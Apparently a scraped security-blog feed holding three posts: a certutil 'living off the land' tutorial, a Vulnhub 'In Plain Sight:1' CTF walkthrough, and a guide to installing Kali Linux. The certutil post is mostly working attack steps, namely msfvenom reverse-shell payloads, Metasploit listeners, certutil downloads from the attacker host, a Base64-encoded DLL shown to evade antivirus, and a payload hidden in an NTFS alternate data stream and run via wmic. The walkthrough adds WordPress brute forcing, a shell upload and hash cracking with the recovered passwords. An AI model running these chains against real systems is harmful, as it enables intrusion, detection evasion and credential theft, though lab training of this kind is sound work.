In simple words, it is an attack that works on the idea of using system tools as backdoors. File-less attack is another example of LOL attack. Attackers who use this tactic works with trusted, in most cases, preinstalled system tools to carry out their attack. Attackers use these tactics to hide their malicious activity in plain sight among the other general activity inside the network or system. As these kinds of attacks operate without triggering any alerts, it is almost impossible for investigators to determine who is behind the said malicious activity even if they discover it.

What is Alternative Data Stream (ADS)?

The NTFS file system consists of the ADS feature. This is an inconspicuous feature that was included, to provide compatibility with files in the Macintosh file system. ADS enable files to incorporate more than one stream of data. In any instance, each file consists of at least one data stream. This default data stream in Windows is recognized as :$DATA.

Windows Explorer can't see what ADSs are in a file (or a way to erase them without actually discarding the original file) but they can be created and accessed with ease. Because they are challenging to detect, thus often used by hackers to hide files on machines that they've compromised. Executables in ADSs can be executed from the command line but without showing up in Windows Explorer.

Some of the CTF Challenges over HackTheBox where certutil can be used are:

Access, Arctic, BigHead, Conceal, Ethereal, Fighter, Giddy, Hackback, Jerry, Rabbit.

Configurations used in Practical

Attacker:

· OS: Kali Linux 2019.4

· IP: 192.168.1.10

Target:

· OS: Windows 10 (Build 18363)

· IP: 192.168.1.11

Working with certutil

Practical #1: Encoding

Certutil contains an encode parameter. It could help to encode file content into Base64. This is a Windows equivalent to the base64 command in Linux.

When working with an executable file, we came across a scenario. In it, the uploading of the executable file was not smooth. We can use certutil to encode the executable file. Then transfer the encoded data, then decode it on the recipient machine.

In the following practical, we first created a text file named "file.txt" and wrote the "This is a plain text" line in it. We did this with Add-Content cmdlet in PowerShell. We can see that it worked when we checked the file using type command. To convert, we will use certutil with encode parameter. We will provide the text file and the file that it should write the encoded data.

Certutil adds two segments "BEGIN CERTIFICATE" and "END CERTIFICATE". The converted contents of the file are between these two segments. We can check the encoded text using the type command.

Add-Content file.txt "This is a plain text"

type .\file.txt

certutil -encode file.txt encoded.txt

type .\encoded.txt

We can use the parameter -encodehex to convert data into Hex encoded files.

Practical #2: Decoding

Certutil can decode the data encoded in Base64. Let's show you a quick method from which you can decode the data. We will be using the file that we encoded in the previous practical. We will use certutil with -decode parameter. Then provide the encoded file and the file it should write the decoded data. We can check the decoded text using the type command.

type .\encoded.txt

certutil -decode encoded.txt decoded.txt

type .\decoded.txt

We can use the parameter -decodehex to decode the Hex encoded files.

Practical #3: Hashing

Hashing means taking data and giving out an output string of a fixed length. Using the cryptography hashing algorithms — e.g., MD5, SHA-1, SHA-256, you can verify if two files are identical or not. The checksum is a hash value used for performing data integrity checks. It’s a kind of signature for a file. By comparing checksum, we can identify duplicate files.

Time to generate some hashes. We will use the file.txt we created earlier. First, we will generate the MD5 hash using certutil parameter -hashfile. With the parameter, file path and algorithm we can hash the file.

certutil -hashfile ".\file.txt" md5

certutil -hashfile ".\file.txt" sha1

certutil -hashfile ".\file.txt" sha256

NOTE: While working with Systems like Windows 7, keep in mind that the hash algorithms are case-sensitive. Be sure to type, for example, “MD5”, not “md5”.

Practical #4: Downloading

In scenarios, where wget, BITSAdmin or any other convention method is blocked. Certutil can be used to download files from the internet. We will be downloading 7zip.exe from the 7zip server as shown in the image.

-URLCache	Display or delete URL cache entries
-split	Split embedded ASN.1 element & Save to files
-f	Force Overwrite

certutil.exe -urlcache -split -f http://7-zip.org/a/7z1604-x64.exe 7zip.exe

dir

Practical #5: Reading Error Code

Suppose you got a system error code without any message. You don't have any source to look up the meaning of the error. This is a common scenario. Certutil can help to look up the message text for system error codes.

certutil -error 8200

certutil -error 0x2009

NOTE: Certutil can perform many more functions related to CA Certificates but we will be focusing on Penetration Testing for now.

Penetration Testing using certutil

Practical #6: Compromising using Malicious Executable

During our initial assessment, we saw that the certutil was actively downloading files from the internet without any kind of verification or assessment. This is an instance that is part of the MITRE | ATT&CK Remote File Copy Tactic.

Certutil can be used to copy a file from one system to another to stage some attacking tools or other files throughout an attack. Files can also be transferred from an outer attacker-controlled system through a Command and Control Channel to bring tools or scripts into the target network to support Lateral Movement.

In the previous practical, we downloaded a file from a remote server. Let's see how we can compromise a Windows System using a Malicious Executable.

We started our attack with Exploit Development. We used the msfvenom tool to generate a Payload for a Reverse TCP Connection to our attacker machine. We provided the msfvenom with the appropriate LHOST and LPORT. The format of the payload was set to an Executable(.exe) File. We named it "shell.exe". After successful execution, the file was created in our "/root" directory. Now to transfer the newly generated we decided to use the HTTP Server generated by a Python One-liner.

msfvenom -p windows/meterpreter/reverse_tcp lhost=192.168.1.10 lport=1234 -f exe > shell.exe

python -m SimpleHTTPServer 80

Now that the payload is hosted on the server, before executing the payload on the Target Machine, we need to start a Listener on Attacker Machine to capture the meterpreter session that would be generated after the execution of the payload.

use exploit/multi/handler

set payload windows/meterpreter/reverse_tcp

set lhost 192.168.1.10

set lport 1234

exploit

After successfully starting a listener on the Attacker, its time to move to Target Machine. Here, we have a PowerShell Terminal. We need to download the payload to this machine. We will use certutil to fetch it. Certutil will make two connections to the remote web server using two different User-Agents. They will be named "Microsoft-CryptoAPI" and "Certutil URL Agent".

NOTE: During our assessment, we found that upon execution the above command an Access Denied Error is notified. Using -verifyCTL instead of -URLCache will let you bypass this error.

After the successful transfer of the Payload to Target Machine. We executed the payload as shown in the image.

certutil.exe -urlcache -split -f http://192.168.1.10/shell.exe shell.exe

.\shell.exe

We went back to our Attacker Machine to see that a meterpreter instance is generated and captured by our listener. We run sysinfo to see the details of the Target System.

sysinfo

We have successfully Compromised the Target Machine using a combination of Certutil and a Malicious Executable.

Practical #7: Compromising with Encoded Malicious DLL

As seen earlier Certutil encodes file content into Base64. This opens up a lot of possibilities. This is an instance that is part of MITRE | ATT&CK Deobfuscate/Decode Files or Information Tactic.

Attackers can use Obfuscated (Difficult to detect/find) Files to conceal evidence of an attack from the analysis. Afterward, they may Deobfuscate (Unhide) those files. This is where certutil comes into the picture. It can decode the data and help bypass Antivirus, IDS/IPS Software. Certutil can also be used to decode a portable executable file that has been hidden inside a certificate file.

Payloads may be compressed, archived, or encrypted to avoid detection. These payloads may be used with Obfuscated Files or Information during Initial Access or later to mitigate detection. Sometimes a user's action may be required to open it for deobfuscation or decryption as part of User Execution. The user may also be required to input a password to open a password protected compressed/encrypted file that was provided by the attacker. Now onto our Practical.

We started our attack with Exploit Development. We used the msfvenom tool to generate a Payload for a Reverse TCP Connection to our attacker machine. We provided the msfvenom with the appropriate LHOST and LPORT. The format of the payload was set to a Dynamic-Link Library(.dll) File. We named it "dll.txt". We can name it any other name which is less suspicious. We use the text file so that it doesn't rise any unnecessary flags. After successful execution, the file was created in our "/root" directory. Now to transfer the newly generated we decided to use the HTTP Server generated by a Python One-liner.

msfvenom -p windows/meterpreter/reverse_tcp lhost=192.168.1.10 lport=1234 -f dll > dll.txt

python -m SimpleHTTPServer 80

use exploit/multi/handler

set payload windows/meterpreter/reverse_tcp

set lhost 192.168.1.10

set lport 1234

exploit

After successfully starting a listener on the Attacker, it times to move to Target Machine. Here, we have a PowerShell Terminal. We need to download the payload to this machine and we need to do this discreetly. We run certutil with a combination of URLCache and encode separated by the pipe (|). Now the file will be downloaded as a text file and gets encoded as another text file which we named "edll.txt" for encoded DLL.

certutil -urlcache -split -f http://192.168.1.10/dll.txt dll.txt | certutil -encode dll.txt edll.txt

Now to execute the payload to compromise the target, we need to decode it. We use the decode parameter in certutil to decode the payload and saved it as "exploit.dll". Now to execute this DLL we decide to use regsvr32. It executes DLL directly into memory.

certutil -decode .\edll.txt exploit.dll

regsvr32 /s /u .\exploit.dll

We went back to our Attacker Machine to see that a meterpreter instance is generated and captured by our listener. We run sysinfo to see the details of the Target System. We have successfully Compromised the Target Machine using a combination of Certutil and an Encoded Malicious Executable.

sysinfo

As we talked about evading Antivirus Software. Let's inspect the files that we generated and used in the attempt to compromise the target. We use VirusTotal for this analysis. We first inspect the "dll.txt". Upon successful upload and analysis of the dll.txt, we see that it was detected by 54 out of 67 Antivirus Engines. That can't be good.

So, the inspection of the dll.txt file was not acceptable. Now let's test the file we encoded using certutil. We uploaded the edll.txt. Upon analysis of the edll.txt, we see that it was detected by 4 out of 56 Antivirus Engines. It is not perfect but it is a huge difference.

Another flavour of this attack can be as depicted below:

We create a payload in the form of an executable(payload.exe). Then we use certutil to encode it to a specific binary. For example, "payload.enc". Then post the output of the encoding process on Github, Pastebin or other alternative services. The purpose of this procedure is to separate the encoded payload from the stager to avoid detection. Now use the certutil on the target machine to download the content from the remote server (Github/Pastebin). Finally, decode the malicious payload into an executable extension using Certutil and execute it to compromise the Target.

Practical #8: Compromising with Malicious Executable inside ADS

We started our attack with Exploit Development. We used the msfvenom tool to generate a Payload for a Reverse TCP Connection to our attacker machine. We provided the msfvenom with the appropriate LHOST and LPORT. The format of the payload was set to an Executable(.exe) File. We named it "virus.exe". After successful execution, the file was created in our "/root" directory. Now to transfer the newly generated we decided to use the HTTP Server generated by a Python One-liner.

msfvenom -p windows/meterpreter/reverse_tcp lhost=192.168.1.10 lport=443 -f exe > "virus.exe"

python -m SimpleHTTPServer 80

use exploit/multi/handler

set payload windows/meterpreter/reverse_tcp

set lhost 192.168.1.10

set lport 1234

exploit

This time we will use a different approach altogether. We are going to use the Alternative Data Stream. Alternative Data Stream (ADS) was created by Microsoft to supporting compatibility with Apple McIntosh’s file system. In the Mac, files have a huge amount of metadata in addition to regular data. To save the exe file into ADS, we need to specify the name of the file in whose ADS we want to save another file, then (:) followed by name and extension of another file. As shown, we saved the virus.exe inside the ADS of harmless.txt file.

certutil.exe -urlcache -split -f http://192.168.1.10/virus.exe harmless.txt:virus.exe

Here, it can be observed that there is no file named virus.exe in the directory and the size of harmless.txt is 0 as well as it contains nothing as it was an originally an empty text file.

dir

type .\harmless.txt

Now to execute the file that we put in the ADS; we will be using wmic. We will use the create flag followed by the path of the payload as shown in the image. It says that the Execution was successful.

wmic process call create "c:\harmless.txt:virus.exe"

We went back to our Attacker Machine to see that a meterpreter instance is generated and captured by our listener. We run sysinfo to see the details of the Target System.

sysinfo

We have successfully Compromised the Target Machine using a combination of Certutil and a Malicious Executable concealed in Alternative Data Stream.

Mitigation

As tools like certutil can be used by an attacker with physical access to the machine or by malicious code unknowingly downloaded by a user after a phishing or other social engineering attack.

Certutil usage should be monitored, particularly if detected it being used with -decode or -decodeHex options where that would not normally be expected in your network. It is paramount not to depend on tools that simply whitelist built-in or signed code as obviously these will be bypassed by such Living Off the Land (LOL) techniques.

Conclusion

This kind of attack is very much happening in real life. There have been multiple incidents targeted to different office environments as well as banks. It was a fun learning experience working with certutil. We are going to write more articles about other LOLS that we could find. Stay Tuned.

Certutil Operations

Living Off Land binaries

Author: Pavandeep Singh is a Technical Writer, Researcher and Penetration Tester Contact here

↧

In Plain Sight:1: Vulnhub Walkthrough

December 8, 2019, 8:32 am

≫ Next: Multiple Ways to Install Kali

≪ Previous: Windows for Pentester: Certutil

In today’s article we will face an Intermediate challenge. Introducing the In Plain Sight:1 virtual machine, created by “bzyo_” and is available on Vulnhub. This is another Capture the Flag challenge where we have to escalate privileges to find the root flag to complete the challenge.

Since these labs are available on the Vulnhub Website. We will be downloading the lab file from this link.

Penetration Testing Methodology

· Network Scanning

o netdiscover

o nmap port scan

· Enumeration

o FTP Enumeration

o Browsing HTTP Service

o Enumerating the wordpress

· Exploitation

o Get a meterpreter session

· Post exploitation

o Reading passwords from file

o Login into MySQL to find hashes

o Using john to crack the hashes

· Privilege escalation

o Using su command

o Finding password

o Checking for SUID

Walkthrough

Network Scanning

The first step is to identify the target. So, to identify our target we will use the following command:

netdiscover

Now we will use Nmap to gain information about the open ports and the services running on the target machine and for this, type the following command :

nmap -p- 192.168.43.8

From the nmap scan we can see that the Port 21, 22, 80 is open, it means we have the FTP, SSH and HTTP services running simultaneously. Firstly, let’s try enumeration with anonymous login on FTP.

After logging in anonymously, we can see that there is a file todo.txt. Download this file using the get command. The content of todo.txt file doesn’t seem to be useful. You can read the file by using cat command.

As FTP wasn’t useful to us, we can now browse the website to see if we can find some information. And for this, open the IP address in our browser.

This is an Apache2 Ubuntu Default page but after exploring it carefully we can see a line hinting to “/var/www/html/index.html”. So, let’s explore this page.

This page looks like a normal page but when we click anywhere on the page then it will lead us to the following new webpage :

As we can see that this webpage lets you to upload any image. So here we tried to upload the image and we succeed but when we try to upload a .php file the webpage give us an error. Upon exploring more, the URL of the webpage caught our attention and you can see that it looks like a hash so we copied it and tried to crack it by using john.

It was “goodluck”. At this point we were just being trolled.

We then tried to upload a simple .php file and when uploading a .php file we come across the follwoing error :

But this error leads us to a new page “upload.php”. Let’s check the source code of this page.

Yes! There is a comment at the end of the source code. And this is a base64 encoded text, so let’s try to decode it by using the following command :

echo c28tZGV2LXdvcmRwcmVzcw== | base64 -d

When the text is decoded, it looks like a directory or a webpage. But before exploring it let’s see if there are more pages or not. Hence, use dirbuster.

There are many pages and as the result shows us that CMS is wordpress, therefore, we can use wpscan to plough through the two specified pages that mentions wordpress. And for that use the following command :

wpcan --url "http://192.168.43.8/wordpress" --enumerate

Similarly, let’s enumerate the other page.

wpcan --url "http://192.168.43.8/so-dev-wordpress" --enumerate

As you can see in the above image there are three users. And we have there usernames, we can simply use bruteforce to find their respective passwords and for that type :

wpscan --url "http://192.168.43.8/wordpress" -U bossperson -P /usr/share/wordlists/dirb/common.txt

Alas, we couldn’t find any password but not to worry as we can run the same command for the other page, let’s try it by typing :

wpscan --url "http://192.168.43.8/so-dev-wordpress" -U admin,mike -P /usr/share/wordlists/dirb/common.txt

And so, we finally found the password for the user admin. So now, let’s try to upload a shell using msfconsole. And through Metasploit we will use exploit/unix/webapp/wp_admin_shell_upload.

Once the exploit is initiated, type the set of following commands :

set PASSWORD admin1

set RHOST 192.168.43.8

set USERNAME admin

set TARGETURI /so-dev-wordpress

exploit

As you can see, we are successful in getting our session, lets move onto shell of the target system and for that type shell and hit enter. And the next thing you know is you are in the shell of the target system. Now to get a proper authenticated session of shell type the following command :

python3 -c ‘import pty;pty.spawn(“/bin/sh”)’

As we have managed to get a shell. So now, we will explore the system more to find some useful files.

Upon changing the directory, we found wp-config.php. as it is a config file, there’s bound to be usefull information. Thus, we will try to read it’s content using the cat command :

cat wp-config.php

These credentials are of mysql as you can see the prefix DB used which probably stands for DataBsase. So, we can try to login into mysql using these credentials and therefore, use the following commands :

bash // (to get a shell)

mysql -u sodevwp -p;

Yes, we are in! Let’s try and explore it further.

We found a database “sodevwp” and hence, to change the database type :

show databases;

use sodevwp

show tables;

select * from sodevwp_users;

Once the above commands are used successfully, you will find the following two hashes :

$P$BD/ZmfBIhgjHKtkLpPKfhr2t5EDgZA. (for user admin)

$P$B3halPOgh4jqI1tDelkv5TGAHnaOC01 (for user mike)

We will now use john the riper with rockyou wordlist to crack these hashes and for that type :

john cracker -wordlist=/usr/share/wordlists/rockyou.txt

As you can see in the image above that we found our passwords to the two major users and those are :

admin:admin1

mike: skuxdelux

Now, try and switch the user to mike and you can observe in the image below that you can successfully do that; which means cracking the passwords was successful.

Let’s move on for privilege escalation. Now, when you change your directory to /home and there you found a new user “joe”

And without wasting any time we traversed through etc/passwd

With etc/passwd we found out that password to ‘joe’ is SmashMouthNoThanks. So now, lets switch the user to joe with the foretold password.

And just like that we have the access of the user ‘joe’.

Now to move forward the only thing we have to do is to get the last flag of the target. And to get the it we check for SUID using the command find. -perm /4000. Before executing this command, we will change our directory to “/” and after running the command we find the following useful binaries.

And in /bwrapwe found our last flag which you can observe from the image below :

Read the flag using cat command as shown in the image below :

VOILA!! We have completed the challenge.

↧

Multiple Ways to Install Kali

December 9, 2019, 8:59 pm

≫ Next: Hiding Shell using PrependMigrate -Metasploit

≪ Previous: In Plain Sight:1: Vulnhub Walkthrough

Multiple Ways to Install Kali

In this article, we will learn how to open the magic box of ethical hacking. Can you guess the name of that box? Ok, I tell you the name is KALI the magic box of ethical hacking. Through this article, you will learn the installation of Kali Linux on different platforms along with the features.

Table of Content

· Introduction of kali Linux

· Features of kali Linux

· Prerequsities for kali Linux installtion

· Kali installation on VM (Virtual machine)

· Kali installation on Virtual Box

· Kali installation on AWS

· Kali installation on Respberry pi

Introduction of Kali Linux

“The quieter you become, the more can to hear”---Kali Linux

As per my definition, Kali Linux is a magic box that contains multiple magic tools to play the magic. In technical terms, Kali Linux is an open-source, Debian based Linux distribution mainly for penetration testing, security auditing, computer Forensic, Security research, etc. it contains over 600 tools of information gathering(Amap, arp-scan, APT2, etc.), vulnerability analysis (Nmap, sqlmap, BBQSQL, etc., ), wireless attack( Airbase-ng, Air crack-ng, airplay-ng, etc.), web applications(BrupSuite, zaproxy, Web Scarab), exploitation (Metasploit, Armitage, crackle), forensics (DFF, Capstone, Binwalk, etc.), etc.
It is developed, maintained and funded by Offensive Security, a leading information security training company.

Features of Kali Linux

Free of cost –it is completely free of cost, you will never have to pay for it. All the development source code are freely available to you.

Over 600 tools available for different functionality e.g computer forensics, penetration testing, etc

Completely customizable – it is easy to customize based on your needs and preferences.

Usable on a wide range of ARM devices.

Prerequisites for Kali Linux Installation

Kali OS software package required a minimum of 10 GB hard disk space for installation.

Minimum 512MB Ram is required for i386 and amd64 architectures.

A bootable CD-DVD Drive or a USB stick.

Give me six hours to chop down a tree and I will spend the first for four sharpening the axe.—Abraham Lincoln

Installation of Kali on Vmware

Vmware Workstation enables users to set up virtual machines on a single physical machine and use them simultaneously along with the actual machine. A Virtual machine can be downloaded from www.vmware.com.

Download kali from http://kali.org/downloads/ 64 bit or 32 bit as per your computer capability.

Click on create a new virtual machine by selecting the Installer disc image file (ISO), and review the configured virtual machine and then powered on the created kali virtual machine.

At the boot menu, many options are available so I am going to describe all boot menu options briefly:

Live (amd64)

Probably the one you're searching for. This one will boot you into Kali, but only in the Live mode. That means, that when you terminate/shutdown your laptop everything you've saved/edited in Kali is lost. So if you make a file on your desktop, that file will be lost when you restart.

This is possible because Kali only writes to RAM and not your HDD.

Live (forensic mode)
This is a special and interesting mode. In this mode, the internal HDD is never touched, and the auto-mounting of devices is disabled. You'll use this when performing forensics on a device (e.g. recovering sensitive files, getting evidence in crime scenes.)

Live USB Persistence
Use this if you want to install Kali on the USB you booted from, this way you can save what you've done, etc. If you now place a file on your desktop, it's saved on your USB and is again accessible when you boot from it.

Live USB Encrypted Persistence
Same as above. Alone with this option, your USB is also encrypted with LUKS. If you choose USB Persistence, choose this one!

(Graphical) Install
If you want to install it on your HDD.

Install with speech synthesis
Install it, the text from the installation-menu is read out to you

But through the down arrow key, you can select Graphical install.

After selection of Graphical install, you will get the multiple next windows of

Preferred language selection- English (select as per your choice) then click continue

Location – United States (select as per your choice) click continue

Standard keymap – American English (select as per your choice) click on continue

On the next screen you will ask to configure the network, select Do not configure the network at this time and hit the continue.

Now in a single word, you can provide the hostname e.g. Kali (any name as per your choice). Then click on continue.

Set the password for the root account. Don’t forget the password you have set for the root account otherwise you have to install kali again.

On the next screen, select the time zone and click continue.

Kali detects the disk partitions. Select guided-use entire disk then click continue.

Installer confirms that partition you are going to use. Click continue.

Select the All files in one partition and click on continue.

Selection of disk partition has been done, you can see the overview of partition disk you currently configured, and select the Finish partitioning and write changes to disk. After that click on continue.

Click on yes to make the changes to disk as per the selected partition changes. Then click on continue.

After partition, now Kali will start installing, you have to around 30 minutes for installation.

After Kali installation, on the next screen, you will get the network mirror option. You need to select Noand click on continue.

You get the option to install the GRUB boot loader as it should be safe to install it to the master boot record of your first hard drive. Select yes and click on continue.

Select the boot loader device for GRUB installation. Select /dev/sda and click Continue.

Now you will see the installation complete dialog box. Click to continue to finalize the installation and wait for the VM to reboot. After reboot, you will see the login screen. Log in with your username or root user and provide your password. You will then see the Kali Linux desktop.

Once the VM reboots, you will see the Kali Linux login screen.

Successfully, Kali installation has been done, now you can start working on Kali Linux.

Installation of Kali Linux on Virtual Box

VirtualBox is a software system for virtualizing the x86 computing design. It acts as a hypervisor, making a VM (virtual machine) within which the user will run another OS (operating system).

The OS within which VirtualBox runs is named the "host" OS. The OS running within the VM is named the "guest" OS. VirtualBox supports Windows, Linux, or macOS as its host OS.

If you have already got put in VirtualBox then well smart otherwise install the newest version and install it from https://www.virtualbox.org/wiki/Downloads.

Prerequisites

· VirtualBox installed in your Linux system

· the image of Kali Linux present in your system

· at least 4GB of RAM

· at least 20-30GB of free disk space

· network to have a system updated

· a processor with the virtualization features enabled (often activated by default)

In virtualization, the guest OS is the virtualized system (so our Kali Linux) and the host OS is our Linux system. You can summarize the configuration that was created by you. Then launch the installation click on the green arrow button to start .

On the next screen, you will see the installer options, select Graphical install.

After the selection of Graphical install, you have to follow all the steps the same as you have done at the time of installation of Kali Linux on VMware.

Installation of Kali Linux On AWS

Amazon Web Services (AWS) is a subsidiary of Amazon that provides on-demand cloud computing platforms and APIs to individuals, companies, and governments, on a metered pay-as-you-go basis. In aggregate, these cloud computing web services provide a set of primitive abstract technical infrastructure and distributed computing building blocks and tools. One of these services is Amazon Elastic Compute Cloud, which allows users to have at their disposal a virtual cluster of computers, available all the time, through the Internet.

For more detail description refer https://en.wikipedia.org/wiki/Amazon_Web_Services.

Prerequisites

· An Aws account

· Minimum 2 GB RAM (to run Metasploit)

Login to https://aws.amazon.com/console/ to navigate web services. From the compute services, select EC2 (Elastic Compute Cloud) and click on Launch Instance.

Click on AWS Marketplace, to search the AMI (Machine Image of Kali Linux)

In the search, tab writes Kali Linux, to the Kali AMI and then click on select.

After selection, you can see the summary of all the instances types, software, amount available for Kali Linux. (As per your requirement you can choose, also free tier instance is also available).Then click on continue.

Now you can choose instance type as per your budget, you can select t2micro along with vcpu 1,2.5GHz, Intel Xeon Family,1GiB memory, EBS only). But to run the Metasploit to need minimum of 2 GB RAM, you can opt t2 small or t2 medium.

Review the selected instance and click on the launch.

Here, you need to create a new key pair and give a name to the key . Click on download key pair as you will not be able to download the file again after it’s created. Then click on Launch Instances.

Save the Downloaded .pem file.

Click on Launch Instances

After Launch instance, you can see the instance is running even you can provide the name to your created instance. Click on connect to get access to SSH with other information on public DNS.

For a Linux user:

You can access the Kali AWS from a linux machine. Set the permissions and connect the SSH server:

Command: chmod 400 ignite.pem

ssh -I ignite.pem root@ec2-18-221-4-175.us-east.2.compute.amazonaws.com

For Window Users:

Open the puttygen and load the previously downloaded private key to convert it into a putty supported format.

Save the private key and close the Puttygen program. Open the Putty program to connect it with Kali Linux, in hostname put the public DNS details and load the private key in the Auth tab under the SSh navigation.

Then click on open

Login with username ec2-user and your kali Linux from the cloud is ready. As this is minimal installation, to get all the tools run the command apt-get install kali-linux-full

Note: You should not go over the usage limit otherwise you will be charged and need to pay the bill.

Installation of Kali on Raspberry Pi

The Raspberry Pi is a low-cost, credit-card-sized ARM computer. Despite being a good bit less powerful than a laptop or desktop PC, its affordability makes it an excellent option for a tiny Linux system and it can do far more than act as a media hub.

The Raspberry Pi provides an SD card slot for mass storage and will attempt to boot off that device when the board is powered on.

By default, the Kali Linux Raspberry Pi image has been streamlined with the minimum tools, similar to all the other ARM images. If you wish to upgrade the installation to a standard desktop installation, you can include the extra tools by installing the kali-Linux-full meta-package.

For more details please refer https://github.com/thehackingsage/HackPi.

Prerequisites

· Kali Linux Raspberry 2,3, 4 ARM images.

· SD card (minimum size 8 GB but can use 16GB 0r even 32 Gb)

· Bootable Kali

First, download the Kali Linux 2 or more image file for a raspberry file from the https://www.offensive-security.com/kali-linux-arm-images/#1493408272250-e17e9049-9ce8.

I need to write it to the SD card. Choose the Kali Linux ISO file to be imaged with “select image” and verify that the USB drive to be overwritten is the correct one. Click the “Flash!” button once ready.

Once Etcher alerts you that the image has been flashed, you can safely remove the USB drive and proceed to boot into Kali with it.

Now, you can have a plugged raspberry pi device with the bootable SD card into the monitor. After powering up the raspberry pi 3 b, it will go through a bootup process and the screen will go blank for a few seconds.

For the final step, a login prompt will appear asking for a username and a password. The default should be 'root' and 'toor' respectively.

Thank you

↧